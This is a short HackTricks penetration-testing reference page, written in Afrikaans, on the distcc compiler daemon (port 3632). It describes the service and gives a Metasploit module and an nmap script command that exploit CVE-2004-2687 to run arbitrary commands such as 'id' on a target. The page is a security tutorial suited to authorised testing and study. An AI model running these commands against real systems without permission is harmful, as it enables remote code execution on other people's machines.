hacktricks/network-services-pentesting/3632-pentesting-distcc.md

3.3 KiB

{% hint style="success" %} Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks
{% endhint %}

Basiese Inligting

Distcc is 'n hulpmiddel wat die kompilasieproses verbeter deur die idle verwerkingskrag van ander rekenaars in die netwerk te benut. Wanneer distcc op 'n masjien opgestel is, kan hierdie masjien sy kompilasietake na 'n ander stelsel versprei. Hierdie ontvangerstelsel moet die distccd daemon draai en moet 'n kompatible kompileerder geïnstalleer hê om die gestuurde kode te verwerk.

Standaard poort: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploitation

Kontroleer of dit kwesbaar is vir CVE-2004-2687 om arbitrêre kode uit te voer:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Ek dink nie shodan detecteer hierdie diens nie.

Resources

Post geskep deur Álex B (@r1p)

{% hint style="success" %} Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}